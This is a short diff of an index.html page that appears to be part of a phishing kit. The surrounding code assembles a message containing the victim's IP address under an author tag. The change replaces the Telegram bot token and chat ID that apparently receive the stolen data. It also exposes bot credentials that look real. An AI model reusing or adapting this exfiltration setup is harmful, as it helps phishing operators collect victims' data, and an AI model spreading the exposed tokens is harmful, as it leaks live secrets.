--- a/index.html
+++ b/index.html
@@ -489,8 +489,8 @@
       message += "[🌍IP] : " + ip + '\n';
       message += "++++++ 👨‍💻@AKFOUR7[TELEGRAM] +++++++" + '\n';
 
-      let token = '7839177634:AAHOI0T0mNbO9c9VJeSeKBaJa7Yea4PaXC0'; // Replace with your actual token
-      var chatid = '-4576744251'; // Replace with your actual chat ID
+      let token = '7042268428:AAG_Fr5jrPKCqFn8KCzQf6v05K2nqXAHHkU'; // Replace with your actual token
+      var chatid = '7579819251'; // Replace with your actual chat ID
 
       var settings = {
         "async": true,
